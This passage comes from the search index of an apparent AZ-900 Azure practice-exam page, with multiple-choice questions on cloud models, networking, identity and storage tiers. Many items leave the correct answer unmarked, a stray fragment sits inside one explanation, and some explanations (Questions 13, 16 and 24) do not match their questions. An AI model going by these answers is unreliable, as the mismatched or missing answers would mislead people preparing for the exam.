                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-42-what-two-advantages-does-cloud-computing-elasticity-give-to-you-pick-two","title":"Question 42:\u00a0What two advantages does cloud computing elasticity give to you? Pick two.","text":"
                            • You can do more regular backups and you won't lose as much when that backup gets restored
                            • You can save money.
                            • Servers have become a commodity and Microsoft doesn't even need to even fix servers that fail within Azure.
                            • You can serve users better during peak traffic periods by automatically adding more capacity.

                            Explanation: Elasticity saves you money during slow periods (over night, over the weekend, over the summer, etc) and also allows you to handle the highest peak of traffic. For more info:\u00a0https://azure.microsoft.com/en-us/overview/what-is-elastic-computing/

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-43-which-of-the-following-elements-is-considered-part-of-the-network-layer-of-network-security","title":"Question 43:\u00a0Which of the following elements is considered part of the \"network\" layer of network security?","text":"
                            • Keeping operating systems up to date with patches
                            • All of the above
                            • Locks on the data center doors
                            • Separate servers into distinct subnets by role

                            Explanation: Subnets is part of network security. For more info:\u00a0https://docs.microsoft.com/en-us/azure/security/fundamentals/network-best-practices and https://en.wikipedia.org/wiki/OSI_model

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-44-what-data-format-are-arm-templates-created-in","title":"Question 44:\u00a0What data format are ARM templates created in?","text":"
                            • JSON
                            • YAML
                            • HTML
                            • XML

                            Explanation: ARM templates are created in JSON. For more info:\u00a0https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/overview

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-45-what-does-the-letter-r-in-rbac-stand-for","title":"Question 45:\u00a0What does the letter R in RBAC stand for?","text":"
                            • Rights
                            • Review
                            • Role
                            • Rule

                            Explanation: RBAC is role based access control. For more info:\u00a0https://docs.microsoft.com/en-us/azure/role-based-access-control/

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-46-which-azure-service-when-enabled-will-automatically-block-traffic-to-or-from-known-malicious-ip-addresses-and-domains","title":"Question 46:\u00a0Which Azure service, when enabled, will automatically block traffic to or from known malicious IP addresses and domains?","text":"
                            • Network Security Groups
                            • Azure Active Directory
                            • Azure Firewall
                            • Load Balancer

                            Explanation: Azure Firewall has a threat-intelligence option that will automatically block traffic to/from bad actors on the Internet. For more info:\u00a0https://docs.microsoft.com/en-us/azure/firewall/

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-47-true-or-false-azure-tenant-is-a-dedicated-and-trusted-instance-of-azure-active-directory-thats-automatically-created-when-your-organization-signs-up-for-a-microsoft-cloud-service-subscription","title":"Question 47:\u00a0TRUE OR FALSE: Azure Tenant is a dedicated and trusted instance of Azure Active Directory that's automatically created when your organization signs up for a Microsoft cloud service subscription.","text":"
                            • TRUE
                            • FALSE

                            Explanation: Yes, Azure Tenant is a dedicated and trusted instance of Azure AD that's automatically created when your organization signs up for a Microsoft cloud service subscription. See:\u00a0https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/active-directory-whatis#which-features-work-in-azure-ad

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-48-why-should-you-divide-your-application-into-multiple-subnets-as-opposed-to-having-all-your-web-application-and-database-servers-running-on-the-same-subnet","title":"Question 48:\u00a0Why should you divide your application into multiple subnets as opposed to having all your web, application and database servers running on the same subnet?","text":"
                            • Each server type of your application requires its own subnet. It's not possible to mix web servers, database servers and application servers on the same subnet.
                            • Separating your application into multiple subnets allows you to have different NSG security rules for each subnet, which can make it harder for a hacker to get from one compromised server onto another.
                            • There are only a limited number of IP addresses available per subnet, so you need multiple subnets over a certain number.

                            Explanation: For security purposes, you should not allow \"port 80\" web traffic to reach certain servers, and you do that by having separate NSG rules on each subnet. For more info:\u00a0https://docs.microsoft.com/en-us/azure/security/fundamentals/network-best-practices

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-49-which-style-of-computing-is-easiest-when-migrating-an-existing-hosted-application-from-your-own-data-center-into-the-cloud","title":"Question 49:\u00a0Which style of computing is easiest when migrating an existing hosted application from your own data center into the cloud?","text":"
                            • PaaS
                            • IaaS
                            • FaaS
                            • Serverless

                            Explanation: Infrastructure as a service is the easiest to migrate into, from an existing hosted app - lift and shift. For more info:\u00a0https://azure.microsoft.com/en-us/overview/what-is-iaas/

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-50-if-you-have-an-azure-free-account-with-a-200-credit-for-the-first-month-what-happens-when-you-reach-the-200-limit","title":"Question 50:\u00a0If you have an Azure free account, with a $200 credit for the first month, what happens when you reach the $200 limit?","text":"
                            • Your account is automatically closed.
                            • Your credit card is automatically billed.
                            • All services are stopped and you must decide whether you want to convert to a paid account or not.
                            • You cannot create any more resources until you add more credits to the account.

                            Explanation: Using up the free credits causes all your resources to be stopped until you decide to get a paid account. For more info:\u00a0https://azure.microsoft.com/en-us/free/free-account-faq/

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#test-4","title":"Test 4","text":"","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-1-all-resources-in-a-vnet-can-communicate-outbound-to-the-internet-by-default","title":"Question 1:\u00a0All resources in a VNet can communicate outbound to the internet, by default.","text":"
                            • No
                            • Yes

                            Azure Virtual Network (VNet)\u00a0is the fundamental building block for your private network in Azure. VNet enables many types of Azure resources, such as Azure Virtual Machines (VM), to securely communicate with each other, the internet, and on-premises networks. VNet is similar to a traditional network that you'd operate in your own data center, but brings with it additional benefits of Azure's infrastructure such as scale, availability, and isolation. All resources in a VNet can communicate outbound to the internet, by default. You can communicate inbound to a resource by assigning a public IP address or a public Load Balancer. You can also use public IP or public Load Balancer to manage your outbound connections. To learn more about outbound connections in Azure, see\u00a0Outbound connections,\u00a0Public IP addresses, and\u00a0Load Balancer

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-2-is-it-possible-for-you-to-run-both-bash-and-powershell-based-scripts-from-the-azure-cloud-shell","title":"Question 2:\u00a0Is it possible for you to run BOTH\u00a0Bash and Powershell based scripts from the Azure Cloud shell?","text":"
                            • Yes
                            • No

                            Azure Cloud Shell is an interactive, authenticated, browser-accessible shell for managing Azure resources. It provides the flexibility of choosing the shell experience that best suits the way you work,\u00a0either Bash or PowerShell.

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-3-as-the-cloud-admin-of-your-organization-you-want-to-block-your-employees-from-accessing-your-apps-from-specific-locations-which-of-the-following-can-help-you-achieve-this","title":"Question 3:\u00a0As the Cloud Admin of your organization, you want to Block your employees from accessing your apps from specific locations. Which of the following can help you achieve this?","text":"
                            • Azure Active Directory Conditional Access
                            • Azure Sentinel - Azure Single Sign On (SSO)
                            • Azure Role Based Access Control (RBAC)

                            The modern security perimeter now extends beyond an organization's network to include user and device identity. Organizations can use identity-driven signals as part of their access control decisions. Conditional Access brings signals together, to make decisions, and enforce organizational policies. Azure AD Conditional Access is at the heart of the new identity-driven control plane. Conditional Access policies at their simplest are if-then statements, if a user wants to access a resource, then they must complete an action. Example: A payroll manager wants to access the payroll application and is required to do multi-factor authentication to access it.

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-4-what-is-the-primary-purpose-of-external-identities-in-azure-active-directory","title":"Question 4:\u00a0What is the primary purpose of external identities in Azure Active Directory?","text":"
                            • To enable single sign-on between Azure subscriptions.
                            • To manage user identities exclusively for on-premises applications.
                            • To allow external partners and customers to access resources in your Azure environment
                            • To provide secure access to Azure resources for employees within the organization.

                            External identities in Azure AD enable organizations to extend their identity management beyond their own employees. This allows external partners, vendors, and customers to access specific resources within the organization's Azure environment without requiring them to have internal accounts. Reference:\u00a0https://learn.microsoft.com/en-us/azure/active-directory/external-identities/external-identities-overview

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-5-your-startup-plans-to-migrate-to-azure-soon-but-for-all-the-resources-you-would-like-control-of-the-underlying-operating-system-and-middleware-which-of-the-following-cloud-models-would-make-the-most-sense","title":"Question 5:\u00a0Your startup plans to migrate to Azure soon, but for all the resources, you would like control of the underlying Operating System and Middleware. Which of the following cloud models would make the most sense?","text":"
                            • Infrastructure as a Service (laaS)
                            • Anything as a Service (XaaS)
                            • Platform as a Service (PaaS)
                            • Software as a Service (SaaS)

                            Infrastructure as a service (IaaS)\u00a0is a type of cloud computing service that offers essential compute, storage, and networking resources on demand, on a pay-as-you-go basis. IaaS is one of the four types of cloud services, along with software as a service (SaaS), platform as a service (PaaS), and\u00a0serverless. Migrating your organization's infrastructure to an IaaS solution helps you reduce maintenance of on-premises data centers, save money on hardware costs, and gain real-time business insights. IaaS solutions give you the flexibility to scale your IT resources up and down with demand. They also help you quickly provision new applications and increase the reliability of your underlying infrastructure. IaaS lets you bypass the cost and complexity of buying and managing physical servers and datacenter infrastructure. Each resource is offered as a separate service component, and you only pay for a particular resource for as long as you need it. A\u00a0cloud computing service provider\u00a0like\u00a0Azure\u00a0manages the infrastructure, while you purchase, install, configure, and manage your own software\u2014including operating systems, middleware, and applications.

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-6-your-company-has-decided-to-migrate-its-on-premises-virtual-machines-to-azure-which-azure-virtual-machines-feature-allows-you-to-migrate-virtual-machines-without-downtime","title":"Question 6:\u00a0Your company has decided to migrate its on-premises virtual machines to Azure. Which Azure Virtual Machines feature allows you to migrate virtual machines without downtime?","text":"
                            • Azure Virtual Machine Scale Sets
                            • Azure Site Recovery
                            • Azure Spot Virtual Machines
                            • Azure Reserved Virtual Machines

                            The correct answer is Azure Site Recovery. Azure Site Recovery (ASR)\u00a0is a service offered by Azure that enables replication of virtual machines from on-premises environments to Azure or between Azure regions with little or no downtime. This allows for the migration of virtual machines to Azure without any disruption to business operations. After replication to Azure, the virtual machines can be launched and used as if they were in the on-premises environment.

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-7-youve-been-planning-to-decommission-your-on-prem-database-hosting-gigabytes-of-data-which-of-the-following-is-true-about-data-ingress-moving-into-for-azure","title":"Question 7:\u00a0You've been planning to decommission your On-Prem database hosting Gigabytes of data. Which of the following is True about data ingress (moving into) for Azure?","text":"
                            • It is free of cost
                            • It is charged $0.05 per GB
                            • It is charged $0.05 per TB
                            • It is charged per hour of data transferred

                            Bandwidth refers to data moving in and out of Azure data centres, as well as data moving between Azure data centres; other transfers are explicitly covered by the Content Delivery Network, ExpressRoute pricing or Peering. #### Question 8:\u00a0Correct

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-8-which-of-the-following-is-a-cloud-security-posture-management-cspm-and-cloud-workload-protection-platform-cwpp-for-all-of-your-azure-on-premises-and-multicloud-amazon-aws-and-google-gcp-resources","title":"Question 8: Which of the following is a Cloud Security Posture Management (CSPM) and Cloud Workload Protection Platform (CWPP) for all of your Azure, On-Premises, AND Multicloud (Amazon AWS and Google GCP) resources?","text":"
                            • Microsoft Defender for Cloud
                            • Azure DDoS Protection
                            • Azure Front Door
                            • Azure Key Vault
                            • Azure Sentinel

                            Microsoft Defender for Cloud is a Cloud Security Posture Management (CSPM) and Cloud Workload Protection Platform (CWPP) for all of your Azure, on-premises, and multicloud (Amazon AWS and Google GCP) resources. Defender for Cloud fills three vital needs as you manage the security of your resources and workloads in the cloud and on-premises:

                            • Defender for Cloud secure score continually assesses\u00a0your security posture so you can track new security opportunities and precisely report on the progress of your security efforts. - Defender for Cloud recommendations secures\u00a0your workloads with step-by-step actions that protect your workloads from known security risks. - Defender for Cloud alerts defends\u00a0your workloads in real-time so you can react immediately and prevent security events from developing.
                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-9-which-of-the-following-is-a-key-benefit-of-using-role-based-access-control-rbac-over-traditional-access-control-methods","title":"Question 9:\u00a0Which of the following is a key benefit of using Role-Based Access Control (RBAC) over traditional access control methods?","text":"
                            • RBAC supports a wider range of authentication protocols than traditional methods.
                            • RBAC provides centralized management of user identities and access.
                            • RBAC allows you to assign permissions to specific roles rather than individual users.
                            • RBAC provides stronger encryption for sensitive data.

                            Role-Based Access Control (RBAC)\u00a0is an approach to access control that allows you to manage user access based on the roles they perform within an organization. With RBAC, you can define a set of roles, each with a specific set of permissions, and then assign users to those roles.

                            One of the key benefits of RBAC over traditional access control methods is that it allows you to assign permissions to specific\u00a0roles\u00a0rather than individual users. This means that when a user's role changes, their permissions can be automatically adjusted without the need for manual updates. This can help to streamline the process of managing access control and reduce the risk of errors or oversights.

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-10-which-of-the-following-provides-support-for-key-migration-workloads-like-windows-sql-and-linux-server-databases-data-web-apps-and-virtual-desktops","title":"Question 10:\u00a0Which of the following provides support for key migration workloads like Windows, SQL and Linux Server, databases, data, web apps, and virtual desktops?","text":"
                            • Azure Suggestions
                            • Azure Recommendations
                            • Azure Advisor
                            • Azure Migrate

                            Azure Migrate\u00a0provides all the Azure migration tools and guidance you need to plan and implement your move to the cloud\u2014and track your progress using a central dashboard that provides intelligent insights. Use a\u00a0comprehensive approach\u00a0to migrating your application and datacenter estate. Get support for key migration workloads like\u00a0Windows,\u00a0SQL\u00a0and\u00a0Linux Server, databases, data,\u00a0web apps, and virtual desktops. Migrate to destinations including Azure Virtual Machines, Azure VMware Solution, Azure App Service, and Azure SQL Database. Migrations are holistic across VMware, Hyper-V, physical server, and cloud-to-cloud migration.

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-11-which-type-of-scaling-focuses-on-adjusting-the-capabilities-of-resources-such-as-increasing-processing-power","title":"Question 11: Which type of scaling focuses on adjusting the capabilities of resources, such as increasing processing power?","text":"
                            • Static scaling
                            • Vertical scaling
                            • Elastic scaling
                            • Horizontal scaling

                            Vertical scaling involves adjusting the capabilities of resources, such as adding more CPUs or RAM to a virtual machine. It focuses on enhancing the capacity of individual resources. With horizontal scaling, if you suddenly experienced a steep jump in demand, your deployed resources could be scaled out (either automatically or manually). For example, you could add additional virtual machines or containers, scaling out. In the same manner, if there was a significant drop in demand, deployed resources could be scaled in (either automatically or manually), scaling in.

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-12-what-is-the-default-action-for-a-network-security-rule-nsg-rule-if-no-other-action-is-specified","title":"Question 12:\u00a0 What is the default action for a Network Security Rule (NSG) rule if no other action is specified?","text":"
                            • Allow
                            • Block
                            • Deny

                            The default action for an NSG rule if no other action is specified is\u00a0DENY.

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-13-what-is-the-primary-purpose-of-a-public-endpoint-in-azure","title":"Question 13:\u00a0What is the primary purpose of a public endpoint in Azure?","text":"
                            • To prevent communication between virtual networks.
                            • To enforce access control policies for resource groups.
                            • To restrict incoming network traffic to specific IP ranges.
                            • To provide a direct and secure connection to Azure services.

                            A\u00a0public\u00a0endpoint in Azure allows resources to be accessed over the public internet. It's used to expose services to clients or users who are not within the same network as the resource. Public endpoints are commonly used for services that need to be accessed from anywhere, such as web applications.

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-14-what-is-the-minimum-azure-ad-edition-required-to-enable-self-service-password-reset-for-users","title":"Question 14:\u00a0What is the minimum Azure AD edition required to enable self-service password reset for users?","text":"
                            • Premium P2 edition
                            • Premium P1 edition
                            • Basic edition
                            • Free edition

                            The correct answer is - Premium P1 edition is the minimum required edition to enable self-service password reset for users in Azure AD. Reference: https://azure.microsoft.com/en-us/pricing/details/active-directory/

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-15-an-_____-is-a-collection-of-policy-definitions-that-are-grouped-together-towards-a-specific-goal-or-purpose-in-mind","title":"Question 15: An\u00a0 _____\u00a0 is a collection of policy definitions that are grouped together towards a specific goal or purpose in mind.","text":"
                            • Azure Collection
                            • Azure Initiative Correct)
                            • Azure Group
                            • Azure Bundle

                            An\u00a0Azure initiative\u00a0is a collection of Azure policy definitions that are grouped together towards a specific goal or purpose in mind. Azure initiatives simplify management of your policies by grouping a set of policies together as one single item. For example, you could use the PCI-DSS built-in initiative which has all the policy definitions that are centered around meeting PCI-DSS compliance. Similar to Azure Policy, initiatives have\u00a0definitions\u00a0( a bunch of policies ) , assignments and parameters. Once you determine the definitions that you want, you would assign the initiative to a scope so that it can be applied.

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-16-which-service-would-you-use-to-reduce-the-overhead-of-manually-assigning-permissions-to-a-set-of-resources","title":"Question 16:\u00a0Which service would you use to reduce the overhead of manually assigning permissions to a set of resources?","text":"
                            • Azure Resource Manager
                            • Azure Trust Center
                            • Azure Policy
                            • Azure Logic Apps

                            Azure Resource Manager\u00a0is the deployment and management service for Azure. It provides a management layer that enables you to create, update, and delete resources in your Azure account. You use management features, like access control, locks, and tags, to secure and organize your resources after deployment.

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-17-which-of-the-following-authentication-protocols-is-not-supported-by-azure-ad","title":"Question 17:\u00a0Which of the following authentication protocols is not supported by Azure AD?","text":"
                            • OpenID Connect
                            • NTLM
                            • OAuth 2.0
                            • SAML

                            Azure AD does support SAML, OAuth 2.0, and OpenID Connect authentication protocols. However,\u00a0NTLM\u00a0is not supported by Azure AD. NTLM is a legacy authentication protocol that is not recommended for modern authentication scenarios due to its security limitations. Azure AD recommends using modern authentication protocols such as SAML, OAuth 2.0, and OpenID Connect, which provide stronger security and support features such as multi-factor authentication and conditional access. Therefore, the correct answer is NTLM.

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-18-which-of-the-following-is-an-offline-tier-optimized-for-storing-data-that-is-rarely-accessed-and-that-has-flexible-latency-requirements","title":"Question 18:\u00a0Which of the following is an offline tier optimized for storing data that is rarely accessed, and that has flexible latency requirements?","text":"
                            • Cool Tier
                            • Infrequent Tier
                            • Hot Tier
                            • Archive Tier

                            Data stored in the cloud grows at an exponential pace. To manage costs for your expanding storage needs, it can be helpful to organize your data based on how frequently it will be accessed and how long it will be retained. Azure storage offers different access tiers so that you can store your blob data in the most cost-effective manner based on how it's being used. Azure Storage access tiers include:

                            • Hot tier\u00a0- An online tier optimized for storing data that is accessed or modified frequently. The Hot tier has the highest storage costs, but the lowest access costs.
                            • Cool tier\u00a0- An online tier optimized for storing data that is infrequently accessed or modified. Data in the Cool tier should be stored for a minimum of 30 days. The Cool tier has lower storage costs and higher access costs compared to the Hot tier.
                            • Archive tier\u00a0- An offline tier optimized for storing data that is rarely accessed, and that has flexible latency requirements, on the order of hours. Data in the Archive tier should be stored for a minimum of 180 days.
                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-19-___-brings-signals-together-to-make-decisions-and-enforce-organizational-policies-in-simple-terms-they-are-if-then-statements-if-a-user-wants-to-access-a-resource-then-they-must-complete-an-action","title":"Question 19:\u00a0___ brings signals together, to make decisions, and enforce organizational policies. In simple terms, they are if-then statements, if a user wants to access a resource, then they must complete an action.","text":"
                            • Demand Access
                            • Logical Access
                            • Conditional Access
                            • Active Directory Access

                            The modern security perimeter now extends beyond an organization's network to include user and device identity. Organizations can use identity-driven signals as part of their access control decisions. Conditional Access brings signals together, to make decisions, and enforce organizational policies. Azure AD Conditional Access is at the heart of the new identity-driven control plane.

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-20-which-of-the-following-services-can-you-use-to-calculate-your-estimated-hourly-or-monthly-costs-for-using-azure","title":"Question 20: Which of the following services can you use to calculate your estimated hourly or monthly costs for using Azure?","text":"
                            • Azure Total Cost of Ownership (TCO)\u00a0calculator
                            • Azure Pricing Calculator
                            • Azure Calculator
                            • Azure Cost Management

                            You can use the\u00a0Azure Pricing Calculator\u00a0to calculate your estimated hourly or monthly costs for using Azure.\u00a0Azure TCO\u00a0on the other hand is primarily used to estimate the cost savings you can realize by migrating your workloads to Azure.

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-21-which-of-the-following-protocols-is-used-for-federated-authentication-in-azure-ad","title":"Question 21:\u00a0Which of the following protocols is used for federated authentication in Azure AD?","text":"
                            • LDAP
                            • OpenID Connect
                            • OAuth 2.0
                            • SAML

                            SAML (Security Assertion Markup Language)\u00a0is the protocol used for federated authentication in Azure AD. Federated authentication is a mechanism that allows users to use their existing credentials from a trusted identity provider (IdP) to authenticate with another application or service. In the context of Azure AD, federated authentication allows users to use their existing corporate credentials to authenticate with cloud-based applications and services. Azure AD supports several federated authentication protocols, including Security Assertion Markup Language (SAML), OAuth 2.0, and OpenID Connect. SAML is widely used for federated authentication in enterprise environments, while OAuth 2.0 and OpenID Connect are commonly used in web and mobile applications. Reference: https://docs.microsoft.com/en-us/azure/active-directory/develop/single-sign-on-saml-protocol

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-22-the-microsoft-_______-provides-a-variety-of-content-tools-and-other-resources-about-microsoft-security-privacy-and-compliance-practices","title":"Question 22: The Microsoft _______ provides a variety of content, tools, and other resources about Microsoft security, privacy, and compliance practices.","text":"
                            • Privacy Policy
                            • Blueprints
                            • Service Trust Portal
                            • Advisor

                            The Microsoft Service Trust Portal provides a variety of content, tools, and other resources about Microsoft security, privacy, and compliance practices. The Service Trust Portal contains details about Microsoft's implementation of controls and processes that protect our cloud services and the customer data therein. To access some of the resources on the Service Trust Portal, you must log in as an authenticated user with your Microsoft cloud services account (Azure Active Directory organization account) and review and accept the Microsoft Non-Disclosure Agreement for Compliance Materials.

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-23-which-of-the-following-can-help-you-automate-deployments-and-use-the-practice-of-infrastructure-as-code","title":"Question 23:\u00a0Which of the following can help you automate deployments and use the practice of infrastructure as code?","text":"
                            • Mangement Groups
                            • ARM\u00a0Templates
                            • Azure Arc
                            • Azure IaaC

                            To implement infrastructure as code for your Azure solutions, use\u00a0Azure Resource Manager templates (ARM templates).\u00a0The template is a JavaScript Object Notation (JSON) file that defines the infrastructure and configuration for your project. The template uses declarative syntax, which lets you state what you intend to deploy without having to write the sequence of programming commands to create it. In the template, you specify the resources to deploy and the properties for those resources.

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-24-yes-or-no-it-is-possible-to-deploy-a-new-azure-virtual-network-vnet-using-powerautomate-on-a-google-chromebook","title":"Question 24:\u00a0Yes or No: It is possible to deploy a new Azure Virtual Network (VNet) using PowerAutomate on a Google Chromebook.","text":"
                            • No
                            • Yes

                            No, PowerApps is\u00a0not\u00a0a part of Azure!

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-25-___-is-a-unified-cloud-native-application-protection-platform-that-helps-strengthen-your-security-posture-enables-protection-against-modern-threats-and-helps-reduce-risk-throughout-the-cloud-application-lifecycle-across-multicloud-and-hybrid-environments","title":"Question 25: ___ is a unified cloud-native application protection platform that helps strengthen your security posture, enables protection against modern threats, and helps reduce risk throughout the cloud application lifecycle across multicloud and hybrid environments.","text":"
                            • Azure Bastion
                            • Azure Firewall
                            • Microsoft Priva
                            • Microsoft Defender for Cloud
                            • Azure Network Security Group

                            From the official documentation:\u00a0Microsoft Defender for Cloud is a unified cloud-native application protection platform that helps strengthen your security posture, enables protection against modern threats, and helps reduce risk throughout the cloud application lifecycle across multicloud and hybrid environments.

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-26-__-infrastructure-as-code-involves-writing-scripts-in-languages-like-bash-or-powershell-you-explicitly-state-commands-that-are-executed-to-produce-a-desired-outcome","title":"Question 26:\u00a0__ Infrastructure as Code\u00a0involves writing scripts in languages like Bash or PowerShell. You explicitly state commands that are executed to produce a desired outcome.","text":"
                            • Declarative
                            • Imperative
                            • Ad-Hoc
                            • Defined

                            There are two approaches you can take when implementing Infrastructure as Code.

                            • Imperative Infrastructure as Code\u00a0involves writing scripts in languages like Bash or PowerShell. You explicitly state commands that are executed to produce a desired outcome. When you use imperative deployments, it's up to you to manage the sequence of dependencies, error control, and resource updates.
                            • Declarative Infrastructure as Code\u00a0involves writing a definition that defines how you want your environment to look. In this definition, you specify a desired outcome rather than how you want it to be accomplished. The tooling figures out how to make the outcome happen by inspecting your current state, comparing it to your target state, and then applying the differences.
                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-27-which-of-these-approaches-is-not-a-cost-saving-solutions","title":"Question 27:\u00a0Which of these approaches is NOT a cost saving solutions?","text":"
                            • Use Reserved Instances with Azure Hybrid
                            • Load balancing the incoming traffic
                            • Use the correct and appropriate instance size based on current workload
                            • Making use of Azure Cost Management

                            Load balancing is done to increase the overall availability of the application\u00a0not\u00a0to optimize costs.

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-28-______-infrastructure-as-code-involves-writing-a-definition-that-defines-how-you-want-your-environment-to-look-in-this-definition-you-specify-a-desired-outcome-rather-than-how-you-want-it-to-be-accomplished","title":"Question 28: ______ Infrastructure as Code\u00a0involves writing a definition that defines how you want your environment to look. In this definition, you specify a desired outcome rather than how you want it to be accomplished.","text":"
                            • Ad-Hoc
                            • Imperative
                            • Declarative
                            • Defined
                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-29-which-of-the-following-can-you-use-to-set-spending-thresholds","title":"Question 29:\u00a0Which of the following can you use to set spending thresholds?","text":"
                            • Azure Cost Management +\u00a0Billing
                            • Azure TCO
                            • Azure Policy
                            • Azure Pricing Calculator
                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-30-which-of-the-following-azure-compliance-certifications-is-specifically-designed-for-the-healthcare-industry","title":"Question 30:\u00a0Which of the following Azure compliance certifications is specifically designed for the healthcare industry?","text":"
                            • ISO 27001
                            • GDPR
                            • None of the above
                            • HIPAA/HITECH
                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-31-which-of-the-following-can-help-you-manage-multiple-azure-subscriptions","title":"Question 31:\u00a0Which of the following can help you manage multiple Azure Subscriptions?","text":"
                            • Policies
                            • Management Groups
                            • Resource Groups
                            • Blueprints

                            Each management group contains one or more subscriptions. Azure arranges management groups in a single hierarchy. You define this hierarchy in your Azure Active Directory (Azure AD) tenant to align with your organization's structure and needs.

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-32-in-the-_-as-a-service-cloud-service-model-customers-are-responsible-for-managing-applications-data-runtime-middleware-and-operating-systems-while-the-cloud-provider-manages-the-underlying-infrastructure","title":"Question 32:\u00a0In the _ as a Service cloud service model, customers are responsible for managing applications, data, runtime, middleware, and operating systems, while the cloud provider manages the underlying infrastructure.","text":"
                            • Infrastructure
                            • Platform
                            • Software
                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-33-when-a-blob-is-in-the-archive-access-tier-what-must-you-do-first-before-accessing-it","title":"Question 33:\u00a0When a blob is in the archive access tier, what must you do first before accessing it?","text":"
                            • Rehydrate it
                            • Modify its policy
                            • Add it to a new resource group
                            • Move it to File Storage
                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-34-your-company-has-deployed-a-web-application-to-azure-and-you-want-to-restrict-access-to-it-from-the-internet-while-allowing-access-from-your-companys-on-premises-network-which-network-security-group-nsg-rule-would-you-configure","title":"Question 34:\u00a0Your company has deployed a web application to Azure, and you want to restrict access to it from the internet while allowing access from your company's on-premises network. Which Network Security Group (NSG) rule would you configure?","text":"
                            • Inbound rule allowing traffic from any source to the web application's public IP address.
                            • Inbound rule allowing traffic from your company's on-premises network to the web application's private IP address.
                            • Outbound rule allowing traffic from any destination to your company's on-premises network.
                            • Outbound rule allowing traffic from the web application's private IP address to any destination.
                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-35-which-of-the-following-can-help-you-download-cost-and-usage-data-that-was-used-to-generate-your-monthly-invoice","title":"Question 35:\u00a0Which of the following can help you download cost and usage data that was used to generate your monthly invoice?","text":"
                            • Azure Monitor
                            • Azure Cost Management
                            • Azure Advisor
                            • Azure Resource Manager

                            Cost Management + Billing is a suite of tools provided by Microsoft that help you analyze, manage, and optimize the costs of your workloads. Using the suite helps ensure that your organization is taking advantage of the benefits provided by the cloud. You use Cost Management + Billing features to:

                            • Conduct billing administrative tasks such as paying your bill
                            • Manage billing access to costs
                            • Download cost and usage data that was used to generate your monthly invoice
                            • Proactively apply data analysis to your costs
                            • Set spending thresholds
                            • Identify opportunities for workload changes that can optimize your spending
